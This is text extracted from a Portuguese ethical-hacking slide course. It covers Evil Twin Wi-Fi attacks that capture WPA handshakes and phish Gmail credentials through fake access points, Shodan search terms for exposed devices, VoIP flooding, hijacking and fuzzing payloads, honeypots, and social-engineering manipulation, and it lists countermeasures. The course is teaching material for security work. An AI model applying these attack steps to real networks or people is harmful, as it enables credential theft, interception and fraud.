Perceba que o cliente pegou um endereço IP do nosso servidor DHCP. Isso significa que ele se conectou com sucesso à interface at0 criada pelo airbase-ng
Marcos Flávio Araújo Assunção
Evil Twin – Capturar o handshake WPA utilizando apenas a estação cliente
Marcos Flávio Araújo Assunção
Evil Twin – WPA Hacking
Perceba no exemplo da imagem anterior que o airbase-ng levantou o Access Point utilizando o ESSID da rede defhack, o BSSID do AP real, a criptografia WPA TKIP (-z 2) e verbose (-v) para gerar mais informações úteis para debug.
Marcos Flávio Araújo Assunção
Evil Twin – WPA Handshake
Capturamos o Handshake utilizando apenas o cliente, sem necessidade nem de ter o Access Point real por perto. Agora basta quebrar com o Aircrack-NG.
Marcos Flávio Araújo Assunção
Eficiência dos ataques de “força-bruta” da chave
Na maioria dos casos, uma chave com uma complexidade muito alta pode levar meses.
Mas e se houver outra forma?E se eu puder simplesmente... “pedir a
chave”?
Marcos Flávio Araújo Assunção
Evil Twin – Criar um Honeypot utilizando o airbase-ng, DNS Spoofing e Apache ou SET
Marcos Flávio Araújo Assunção
Evil Twin – DNSSPOOF e Apache
Usando os comandos mostrados realizamos:- Iniciamos o dns spoof na interface at0 (dnsspoof –i at0)- Iniciamos o Apache (apache2ctl start)
Marcos Flávio Araújo Assunção
Evil Twin - Apache
Veja que qualquer site que o cliente abrir será direcionando para o nosso servidor Apache. Como poderíamos substituir essa página?
Marcos Flávio Araújo Assunção
Evil Twin – Apache com MySQL
Marcos Flávio Araújo Assunção
Evil Twin – Apache com MySQL
Marcos Flávio Araújo Assunção
Evil Twin – Social Engineering Toolkit
Selecionamos o ataque no SET e escolhemos o Gmail como template. Importante: o airbase-ng e o dnsspoof devem continuar rodando em janelas separadas.
Marcos Flávio Araújo Assunção
Evil Twin – Página falsa do SET
Marcos Flávio Araújo Assunção
Evil Twin – Capturando credenciais no SET
Marcos Flávio Araújo Assunção
Evil Twin – Criando uma ponte
Podemos criar uma bridge entre a interface at0 do AP falso e uma interface de rede ethernet (ou outra interface Wireless). Assim o cliente poderá usar a Internet.
Marcos Flávio Araújo Assunção
Evil Twin - Wireshark
Com o Wireshark, capturamos o tráfego de Internet do usuário
Marcos Flávio Araújo Assunção
Evil Twin com FreeRadius – WPA Enterprise
Marcos Flávio Araújo Assunção
Evil Twin com FreeRadius
Marcos Flávio Araújo Assunção
Usando asleap para força-bruta no hash
Marcos Flávio Araújo Assunção
Uso de um WIDS/WIPS contra Evil Twins
• Wireless Intrusion Detection/Prevention System (WIDS/WIPS)- Realiza proteção ativa/passiva de
uma rede wi-fi.
- Atua contra injeção de pacotes ARP, captura de handshakes WEP/WPA e auxilia na detecção de Rogue APs
- Protege contra Evil Twins desassociando as estações desses APs malignos.
Marcos Flávio Araújo Assunção
Multipot
• São vários Evil Twins criados com o airbase-ng, cada um com um MAC (BSSID) diferente.
• Isso permite aumentar a concorrência entre o AP real e os falsos.
• Inutiliza a “proteção” do WIPS contra Evil Twins.
Marcos Flávio Araújo Assunção
Multipot (Múltiplos Evil Twins)
Uma antena com maior ganho (maior dBi) será decisiva na escolha do Sistema Operacional do cliente pelo AP correto.
Marcos Flávio Araújo Assunção
Indo além – Ataques ainda mais avançados
• FakeAuth = Autenticação WEP sem precisar descobrir a chave
• DNS Tunneling = Permite navegar em APs “abertos” (OSA) burlando totalmente a autenticação via browser.
• Evil Twin + Metasploit = Permite explorar falhas no computador alheio, comprometendo totalmente o sistema.
• Multipot + Deauth + DNS Spoofing + Bridge + Ettercap/SSL Strip= Apocalypse!
Marcos Flávio Araújo Assunção
Contra-medidas para os problemas e ataques apresentados em Wi-Fi
Marcos Flávio Araújo Assunção
Como se proteger então?
• Utilizar WPA2-Enterprise com client-side certificates e múltiplas camadas de autenticação.
• Implementar um WIPS com diversos sensores espalhados pelo ambiente
• Implementar um HIDS (Host-based IDS) para que os ataques de desautenticação sejam impedidos a nível de host.
• Definir VLANs, filtros de acesso MAC e ocultar a rede• Usar criptografia nos protocolos e serviços de camadas
superiores. Ex: IPSEC, SSL, etc.• Realizar Penetration Tests• Localizar e remover o Rogue AP e o Evil Twin
“É impossível estar totalmente seguro. O segredo é: dificultar tanto a vida de um possível atacante de modo que o investimento para invadir a rede seja maior que a motivação para fazê-lo”
Marcos Flávio Araújo Assunção
Localizar Rogue AP - Trilateração
Marcos Flávio Araújo Assunção
Localizar Rogue AP - Trilateração
Ekahau HeatMapper
Não serve para localizar um Evil Twin
Marcos Flávio Araújo Assunção
Localizar Evil Twin - GPSD
Usando o gpsd (gps daemon) para inicializar o GPS USB. É necessário
fazê-lo antes de abrir o Kismet Marcos Flávio Araújo Assunção
Localizar Evil Twin – Kismet + GPS
Acima, os dados de localização capturados pelo GPS.
Marcos Flávio Araújo Assunção
Localizar Evil Twin - Giskismet
O Giskismet está exportando os dados gerados para o Kismet para um
formato que pode ser aberto no Google Maps/Earth.
Marcos Flávio Araújo Assunção
Localizar Evil Twin – Google Maps
Dados de localização dos Access Points
Marcos Flávio Araújo Assunção
Localizou Evil Twin? Pega rex!
Marcos Flávio Araújo Assunção
SHODAN HQ
Marcos Flávio Araújo Assunção
Varredura – Um processo barulhento e necessárioO NMAP é sinônimo de varredura e descoberta de
máquinas e serviços em uma rede.
Entretanto, com a utilização cada vez maior de firewalls e IDS o processo de varredura tem perdido um pouco de sua eficácia, e pode ser facilmente detectado.
A solução? Sair da varredura manual e utilizar um bot especializado para encontrar dispositivos. Podemos fazer isso de forma fácil através do SHODAN HQ.
IntroduçãoShodan HQ é um projeto que visa criar um buscador que
identifique qualquer dispositivo conectado à Internet.
Além de encontrar o dispositivo, Shodan é capaz de descobrir o sistema operacional, as portas abertas e muito mais sobre ele.
www.shodan.iowww.shodanhq.com
Shodan HQ
Serviços oferecidos pelo Shodan
O Shodan oferece serviços gratuitos e pagos. É recomendável criar uma conta gratuita (pode ser integrada com o facebook) para a utilização de alguns termos mais avançados de pesquisa.
Entre os serviços pagos está a possibilidade do uso de mapas integrados com a varredura. Esses mapas mostram onde está fisicamente localizado o dispositivo que você encontrou.
Mapa dos dispositivos encontrados
Mapa de dispositivos mundial
Termos de pesquisaEntre os comandos que podemos utilizar para uma pesquisa, estão:
country -> paíscity -> cidadeport -> porta geo -> coordenadas geográficasnet -> Sub-rede os -> Sistema operacionalhostname -> Nome de hostbefore -> Antesafter -> depois
A sintaxe usada é: comando:argumento
Paíscountry:br
Cidadecity:”BeloHorizonte”
Portaport:22
Geo-Localizaçãogeo:0,-1
Faixa de rede:net:200.10.1.0/24
Sistema Operacional:os:”windows xp”
Nome de hosthostname:”gov.br”
before:01/01/2014
after:01/09/2014
Combinando comandos de pesquisa
Utilizar os comandos de forma individual já leva a resultados bem interessantes.
Entretanto, se quisermos nos aprofundar na pesquisa podemos combinar os comandos da maneira que desejarmos.
Somente a sua imaginação é o limite: quaisquer comandos podem ser misturados.
Servidores SMB (netbios) no Brasil
Servidores Apache em Belo Horizonte
Sistemas com o nome gvt nas coordenadas
Sistema na rede 200.195.16.0/24 com a porta 8080
Sistemas Windows XP com hostname atm
Sistemas brasileiros descobertos entre 01/07 e 08/09
O que pesquisar?Para descobrir equipamentos interessantes, pesquise coisas como:
- Fabricante (ex: Cisco)- Modelo do dispositivo (ex: WRT54G)- “default password”- “basic authentication”- Nome da empresa (ex: Microsoft)- Domínio (ex: gvt.net.br)
O que pesquisar?
E após descobrir os sistemas?A versão paga do Shodan permite uso de plugins para integração com diversas ferramentas – inclusive Metasploit.
Aba Exploits - Shodan
Scanhub – Integração com NMAP
Vulnerabilidades de Voz sobre IP (VoIP)
Marcos Flávio Araújo Assunção
- VoIP é um conjunto de tecnologias que permite quechamadas de voz sejam feitas através da internet
- Possibilita realização de chamadas de baixo custo, ou até mesmo gratuitas.
- Redução de custos com infra-estrutura.
- Acrescenta novas funcionalidades ao serviço telefônico
VOIP
Marcos Flávio Araújo Assunção
Vulnerabilidades do VOIP
Marcos Flávio Araújo Assunção
Protocolos
Protocolos de Sinalização
Responsáveis por iniciar, monitorar, modificar e terminarchamadas VoIP.
- SIP (Session Intitation Protocol ) - RFC 3261- SDP (Session Description Protocol) – RFC 4566- MGCP (Media Gateway Control Protocol) – RFC 3435- Megaco / H.248 – RFC 3525
Marcos Flávio Araújo Assunção
Protocolos
Protocolos de Mídia
Responsáveis por transportar o fluxo de mídia (Voz ou imagens)
- RTP (Real Time Protocol ) - RFC 3261- RTCP (Real Time Control Protocol) – RFC 3605- SRTP / ZRTP
Marcos Flávio Araújo Assunção
Protocolos
Codecs
Realizam a compressão do fluxo de mídia de forma que possa ser otimizada a banda.
- G.711 (64 kbit/s )- GSM (12.2 kbit/s)- G.729 (8 kbit/s)- G.723 (6.3 kbit/s)
Marcos Flávio Araújo Assunção
SIP (Session Initiation Protocol)
- Protocolo de sessão mais utilizado dentro da tecnologiaVoIP
- Arquitetura baseada no modelo de cliente-servidor onde os clientes iniciam uma chamada e o servidor responde às chamadas.
- Protocolo baseado em texto e se assemelha com o HTTP
- mensagens SIP são compostas de requisições e respostas especificas
Marcos Flávio Araújo Assunção
Elementos da arquitetura SIP
- User agents (UA)- Proxy Server- Registration Server- Redirect Server- Location Server
Marcos Flávio Araújo Assunção
Call Flow / SIP
Marcos Flávio Araújo Assunção
Ameaças – Modelo em camada
Marcos Flávio Araújo Assunção
Ameaças
- Invite Flood
- Registration Hijacking
- Escuta Telefônica
- Fuzzing
- SPIT
Camada 6 – Aplicações e Dados Voip
Marcos Flávio Araújo Assunção
- INVITE = Mensagem usada para iniciar uma chamada
- Consiste em enviar milhares de mensagens invite com algumasmodificações na mensagem (From, To, invalid IP, invalid Domain, etc...)
- Como o SIP utiliza (na maioria dos casos) o UDP é fácil gerar pacotes com origem spoofed.
INVITE sip:[email protected] SIP/2.0Via: SIP/2.0/TCP client.atlanta.com:5060;branch=z9hG4bK74bf9Max-Forwards: 70From: BigGuy <sip:[email protected]>;tag=9fxced76slTo: LittleGuy <sip:[email protected]>Call-ID: [email protected]: 1 INVITEContact: <sip:[email protected];transport=tcp>Content-Type: application/sdpContent-Length: 143
Invite Flood
Marcos Flávio Araújo Assunção
- IAX Flooder- INVITE Flooder- RTP Flooder- SIPSak (SIP swiss army knife)
Invite Flood - Ferramentas
Marcos Flávio Araújo Assunção
Registration HijackingREGISTER Mensagem usada para registrar um usuário em um servidor sip
UA leva de 1800 a 3600 ms para se registrar
Consiste em:
- substituir o registro de um usuário legítimo por um falso
- remover o registro de um usuário válido
- Usado como base para ataques de MITM.
Marcos Flávio Araújo Assunção
Exemplo Registration Hijack
REGISTER sip: sip.my_proxy.com:5060 SIP/2.0Via: SIP/2.0/UDP 192.168.1.56:5060From: <sip:[email protected]_proxy.com>;tag=0002-0000-D2C784D6To: <sip:[email protected]_proxy.com>Call-ID: rE0x0001-0001-65C2F446-99@AAE2A42DF82D1D0AACSeq: 500646445 REGISTERContact: <sip:[email protected]:5060>Expires: 1800User-Agent: VEGA400/10.02.07.2xS009Content-Length: 0
REGISTER sip: sip.my_proxy.com:5060 SIP/2.0Via: SIP/2.0/UDP 192.168.1.56:5060From: <sip:[email protected]_proxy.com>;tag=0002-0000-D2C784D6To: <sip:[email protected]_proxy.com>Call-ID: rE0x0001-0001-65C2F446-99@AAE2A42DF82D1D0AACSeq: 500646445 REGISTERContact: <sip:[email protected]:5060>Expires: 1800User-Agent: VEGA400/10.02.07.2xS009Content-Length: 0
Registro normal
Registro hijacked
Marcos Flávio Araújo Assunção
Registration Hijacking - Ferramentas
Registration Adder
Registration Eraser
Registration Hijacker
Reghijacker
Marcos Flávio Araújo Assunção
Fareja o tráfego e decodifica os pacotes
Usa técnicas como ARP Poisoning
Softwares: Cain, WireShark, DTMF Decoder
Call Eaversdropping - Escuta
Marcos Flávio Araújo Assunção
Escuta – Salvando conversas
Marcos Flávio Araújo Assunção
Escuta – Detectando Dígitos
Marcos Flávio Araújo Assunção
Fuzzing
É um método para encontrar erros e vulnerabilidades,através da criação de diferentes tipos de pacotesdirecionados para o protocolo que se deseja testar, levando as especificações do protocolo ao seu ponto de quebra.
Resultados obtidos:
- Buffer Overflows- Format String Vulnerability- Integer Overflow- Endless Loops and Logic Errors
Marcos Flávio Araújo Assunção
Fuzzing - Exemplo
INVITE sip:[email protected] SIP/2.0Via: SIP/2.0/TCP client.atlanta.com:5060;branch=z9hG4bK74bf9Max-Forwards: 70From: BigGuy<sip:UserA@atlanta.comZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ>;tag=9fxced76slTo: LittleGuy <sip:[email protected]>Call-ID: [email protected]: 1 INVITEContact: <sip:[email protected];transport=tcp>Content-Type: application/sdpContent-Length: 143
Marcos Flávio Araújo Assunção
Fuzzing - Ferramentas
- Asteroid- Fuzzy Packet-Interstate Fuzzer- ohrwurm- PROTOS H.323 Fuzzer- PROTOS SIP Fuzzer- SIP Test Framework (SFTF)- Sip-Proxy
Marcos Flávio Araújo Assunção
SPIT (Spam Over Internet Telephony)
Geração, automatizada, de chamadas não solicitadas
Não é possível deletar a chamada (como fazemos comSPAM)
Ferramentas:- Spitter- TeleYapper
Marcos Flávio Araújo Assunção
Esteganografia em fluxos RTP
“Esteganografia é o estudo e uso de técnicas para ocultar uma mensagem dentro da outra”
Marcos Flávio Araújo Assunção
Métodos de proteção - VOIP
- Utilização de TCP/TLS
- Segmentação com VLAN
- Utilização de Autenticação emSIP
- Encriptação de Mídia(ZRTP/SRTP)
- Diminuição do tempo de registro (evita hijacking)
- Gerenciamento de Identidades(RFC4474)
Marcos Flávio Araújo Assunção
Uso de Honeypots em Uso de Honeypots em Ethical HackingEthical Hacking
Marcos Flávio Araújo Assunção
Definição de Honeypot
Honeypot significa “pote de mel”
Recurso cuja única utilidade é serinvadido, permitindo a análise das ações do invasor e suaidentificação na rede.
Marcos Flávio Araújo Assunção
Histórico
The Cuckoo's Egg Livro de Cliff Stoll, de 1990, conta como o
autor caçou o hacker alemão que invadiu ossistemas do Lawrence Berkeley Labs. Écitado como primeiro relato do uso dehoneypots para observar as ações de uminvasor.
Marcos Flávio Araújo Assunção
Histórico
Honeynet project Projeto com fins não lucrativos de um grupo de
pesquisadores sobre o uso de honeypots. O trabalho do grupo rendeu outro livro, “Know Your Enemy”, onde são apresentadasanálises de invasões capturadas durante o projeto. Inclui instruções para a montagem dehoneynets.
Marcos Flávio Araújo Assunção
Tipos de Honeypot
Honeypot de produção: Servem para distrair atividades maliciosas de máquinas da rede ou como mecanismo de alerta na rede de computadores.
Honeypot de pesquisa: Servem para monitorar e estudar os comportamento dos atacantes.
Marcos Flávio Araújo Assunção
Objetivo de um Honeypot
Conhecer o inimigo (Blackhats), suas ferramentas, suas táticas e suas motivações;
Coletar dados e analisar ferramentas para aperfeiçoamento de sistemas de detecção de instrusão;
Controle das ações intrusivas
Marcos Flávio Araújo Assunção
Níveis de interação
nível de atividade que o honeypot permite ao atacante:
Honeypots de baixa interação
Honeypots de alta interação
Marcos Flávio Araújo Assunção
Baixa interação
apenas emulam serviços e sistemas operacionais;
fácil instalação;
riscos mínimos;
fácil descoberta por invasores
Marcos Flávio Araújo Assunção
Alta interação
sistemas operacionais e serviços reais;
permite capturar mais informações;
instalação mais complexa;
risco maior
Marcos Flávio Araújo Assunção
Baixa & Alta Interação
Baixa Interatividade Alta Interatividade
Emulam sistemas e serviços Executam as versões reais
Simples. Fácil gerenciamento Cuidados na instalação e configuração.
Atacante não tem controle Controle total
Ações limitadas, captura de tráfego
Captura de mais informações, incluindo ferramentas e comandos
Difíceis de iludir atacantes avançados/determinados
Difícil de destinguir de um sistema de produção
Marcos Flávio Araújo Assunção
Localização de um Honeypot
Em frente ao firewall
Atrás do firewall (Intranet)
DMZ (Demilitarized Zone)
Marcos Flávio Araújo Assunção
Localização de um Honeypot
Marcos Flávio Araújo Assunção
Legalidade dos Honeypots
Armadilha:
coagir ou induzir alguém a fazer algo que normalmente não faria, ou seja, instigar a prática de um delito, pode acarretar processo judicial.
honeypot não induz ninguém, até porque muitas vezes é emulação do sistema de produção da empresa;
os ataques são por iniciativa do invasor; os honeypots não estão sendo usados para processar ninguém, e
sim como meio para novas descobertas.
Marcos Flávio Araújo Assunção
Legalidade dos Honeypots
Privacidade: o sistema que o atacante está usando não
pertence a ele, portanto toda monitoração realizada no sistema não pode caracterizar quebra de privacidade.
Responsabilidade se o honeypot for comprometido e utilizado para
prejudicar outras redes pode acarretar processo civil.
Marcos Flávio Araújo Assunção
Honeynet
Honeynets Redes que são utilizadas como honeypots Podem ser compostas simplesmente de um
gateway e de um máquina honeypot Permitem maior controle do tráfego
outbound do honeypot Facilidade na captura dos dados transmitidos
(todo tráfego passa pelo gateway)
Marcos Flávio Araújo Assunção
Honeynet
É uma rede altamente controlada onde todo pacote que entra ou deixa a honeynet é monitorado, capturado, e analisado.
Qualquer tráfego que entra ou deixa a Honeynet é suspeito por natureza.
Honeynet é um tipo de honeypot de alta interação, utilizada principalmente para pesquisa.
Marcos Flávio Araújo Assunção
Componentes de uma Honeynet
Roteador:Roteador: componente de interconexão e tem por função decidir qual o caminho que os pacotes que lhe são enviados deverão seguir
FirewallFirewall: componente de contenção de fluxo de dados que separa, restringe e analisa datagramas IP que passam por ele.
Marcos Flávio Araújo Assunção
Funcionamento de uma Honeynet
Tornar a rede ativa: Criar contas de usuários; Enviar e-mails entre eles; Forjar documentos em alguns diretórios; Utilizar FTP ou TELNET; Utilizar alguns comandos que serão
armazenados em histórico
Marcos Flávio Araújo Assunção
Logs de auditoria na Honeynet
Exemplo de envio de logs de auditoria para o Logserver
Marcos Flávio Araújo Assunção
Tipos de Honeynets
ClássicaClássica:: Composta por sistemas reais (físicos)
Instalações específicas;
Sistemas operacionais variados e independentes
Marcos Flávio Araújo Assunção
Honeynet Clássica
Marcos Flávio Araújo Assunção
Honeynet Clássica
Vantagens: Dispositivos reais; Mais segurança pela descentralização dos honeypots
Desvantagens: Custo elevado; Dificuldades na instalação e administração; Complexidade para manutenção; Espaço alocado muito grande;
Marcos Flávio Araújo Assunção
Tipos de Honeynets
VirtualVirtual:: Composta por Honeypots virtuais (máquinas
virtuais);
Uso de emuladores;
Todo ambiente composto por uma única máquina (sistemas operacionais emulados)
Marcos Flávio Araújo Assunção
Honeynet Virtual
Marcos Flávio Araújo Assunção
Honeynet Virtual
Vantagens: custo reduzido; gerenciamento facilitado; facilidade na instalação e administração;
Desvantagens: limitação nos tipos de sistemas operacionais
oferecidos pelos softwares de virtualização; possibilidade de comprometimento do software
de virtualização; instabilidade pelo uso exaustivo de memória
Marcos Flávio Araújo Assunção
Honeytokens
Conceito Honeytokens seguem a tendência inversa das
honeynets: são informações cujo únicoobjetivo é serem acessadas indevidamente.
Honeytokens são grandes aliados na detecção de intrusos e não trazem os mesmos riscos ecustos dos honeypots
Marcos Flávio Araújo Assunção
Honeytokens
Conceito Para que sejam úteis, é imprescindível contar com
uma estrutura de detecção adequada. IDS Network Based
Pode detectar o tráfego de honeytokens na rede. Não pode detectar honeytokens transmitidos criptografados
IDS Host Based Não sofre problemas com a criptografia Deve estar habilitado em toda máquina que tem
honeytokens Pode ser simplesmente a auditoria de acesso do sistema
operacional ou do gerenciador de banco de dados.
Marcos Flávio Araújo Assunção
Honeytokens
Marcos Flávio Araújo Assunção
Honeytokens
Usuários Usuários com aparentes altos privilégios
podem ser criados com senhas extremamente complexas, reduzindo o risco de utilização e permitindo maior foco pelo IDS.
Usuário membro do grupo “administrators” no Windows
Senha forte pode ser montada utilizando-se caracteres gerados pelo uso da tecla ALT
Marcos Flávio Araújo Assunção
Utilitários utilizados para criar Honeypots de baixa e média interação
Marcos Flávio Araújo Assunção
HoneydHoneyd
Um dos principais aplicativos para construção de honeypots;
Sistemas Unix;
Emula vários sistemas operacionais;
Assumir identidade de um IP que não esteja sendo utilizado;
Pode monitorar todas as portas baseadas em UDP e TCP;
Marcos Flávio Araújo Assunção
Honeyd Exemplo de configuração do Honeyd:
# Example of a simple host template and its binding
create default
set default personality “FreeBSD 2.2.1-STABLE”
add default tcp port 80 “sh scripts/web.sh”
add default tcp port 22 "sh scripts/test.sh $ipsrc $dport"
add default tcp port 113 reset
add default tcp port 1 reset
set default uid 32767 gid 32767
bind 192.168.1.15 default
set 192.168.1.15 uptime 1327650
#add default tcp port 23 proxy 192.168.1.13:23
#set default subsystem “/usr/sbin/httpd”
Marcos Flávio Araújo Assunção
Honeyd
Marcos Flávio Araújo Assunção
KFSensor
Honeypot comercialPossui diversos serviços disponíveis para
se habilitarTambém simula muitos tipos de cavalos
de tróiaFácil utilização
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Specter
É instalado em um único equipamentoHoneypot de baixa interaçãoPode emular diferentes sistemas
operacionais, tais como Windows XP, Linux, AIX e outros
Configuração mais complexa
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Valhala Honeypot
Honeypot de baixa e média interação Mais leve Único com versão em português Configuração simples e intuitiva Possui diversos servidores, tais como WEB,
FTP, SMTP, TFTP, FINGER, TELNET. Desenvolvido por Marcos Flávio Assunção http://valhalahoneypot.sourceforge.net
Marcos Flávio Araújo Assunção
Valhala Honeypot
Marcos Flávio Araújo Assunção
Vulnerabilidades Humanas (e Físicas)
Marcos Flávio Araújo Assunção
Pergunta
Se a segurança é maior, por que os ataques de sucesso aumentam cada vez mais?
Marcos Flávio Araújo Assunção
Resposta
Pois sabe-se que a melhor chance de burlar um sistema seguro é atacar o elo mais fraco da corrente...
o USUÁRIO
Marcos Flávio Araújo Assunção
Engenharia Social
Conhecida como “Arte de enganar”
Consiste em atacar o elo mais fraco de qualquer sistema: o ser humano
Demonstrada no filme “Takedown”, que conta a história do hacker Kevin Mitnick.
“ – Olá, esqueci minha credencial.“Kevin Mitnick, Takedown
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
O que temos a ver com isso?
Pessoas Físicas
- Roubo de conta bancária - Golpes e vigarismo - Sequestros
Empresas
- Fatores de risco mal calculados - Vazamento de informações - Perdas financeiras
Marcos Flávio Araújo Assunção
Tipos de ataques
Internet / Telefone- Phishing- Identity Theft- Fake Mail
Pessoalmente- Shoulder Surfing- Dumpster Diving- Rush Authentication- Identity Theft
Marcos Flávio Araújo Assunção
Dumpster Diving
Utilidade: Obter documentos com informações sensíveis, no caso foi encontrado papel com usuário e senha anotado.Marcos Flávio Araújo Assunção
Fake Mail
Marcos Flávio Araújo Assunção
Phishing Scam
Marcos Flávio Araújo Assunção
O que é Phishing?
Phishing = Pescaria Consiste em enviar e-mails atrativos e curiosos com links para programas maliciosos ou incitando atividade enganosa
Quem pratica o Phishing é normalmente chamado de Phishing “Scammer”.
Marcos Flávio Araújo Assunção
Crescimento do Phishing
Marcos Flávio Araújo Assunção
Exemplos de Phishing
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Nigerian ScamsNigerian Scams
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Manipulação avançada com Manipulação avançada com a Engenharia Sociala Engenharia Social
Marcos Flávio Araújo Assunção
Manipulando o ser humano
Objetivo: Conquista do sentimento Autor: engenheiro social Meios: telefone, internet, físico. Pontos principais:
CuriosidadeConfiançaSimpatiaCulpaIntimidaçãoOrgulho
Marcos Flávio Araújo Assunção
Curiosidade
Caminho mais fácil E-mails curiosos Promoções tentadoras Caso:
O CD de fotos no elevadorPendrive “perdido”Outdoor Celular a 1 real
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Confiança
Quando há confiança, o engenheiro social age com mais facilidade.
Como essa confiança é gerada? “Autenticação” por conhecimento prévio Fake Mail Caso:
Roubando com autorizaçãoO detetive e a atendente da locadora
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Simpatia
Adoramos pessoas simpáticas. Isso é um fato. A dificuldade de se dizer “não” quando alguém
é simpático conosco. Está diretamente ligada ao orgulho Caso:
Simpatia pela bajulação
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
CulpaCulpa
A culpa é um excelente argumento A culpa é um excelente argumento para se obter informações.para se obter informações.
O desespero de um culpado pronto O desespero de um culpado pronto para ajudar.para ajudar.
Casos:Casos:O novato que apagou o que não deviaO novato que apagou o que não deviaPrestação de favorPrestação de favor
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Intimidação
Objetiva gerar medo Objetiva gerar medo Tom de voz firmeTom de voz firme““Faça isso agora“Faça isso agora“Inclui ameaças à negaçãoInclui ameaças à negaçãoCaso:Caso:
Relatório terceirizado atrasadoRelatório terceirizado atrasado
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Como cair nos truquesComo cair nos truques
Baixo “Desconfiometro”Baixo “Desconfiometro”Não destruir documentosNão destruir documentosRevelar dados sem consultaRevelar dados sem consultaDesconfiança passivaDesconfiança passivaAcessar sistemas duvidososAcessar sistemas duvidososCuriosidade em excessoCuriosidade em excessoFalar sobre dados confidenciais Falar sobre dados confidenciais
fora do ambiente da empresafora do ambiente da empresa
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Como se proteger?Como se proteger?
TreinamentosTreinamentosWorkshopsWorkshopsEstudo de casosEstudo de casosClassificação das Classificação das
InformaçõesInformaçõesPenTestPenTestPolíticas rígidasPolíticas rígidas
Marcos Flávio Araújo Assunção
Marcos Flávio Araújo Assunção
Ethical Hacking
Marcos Flávio Araújo AssunçãoCertified Ethical Hacker [email protected]
Marcos Flávio Araújo Assunção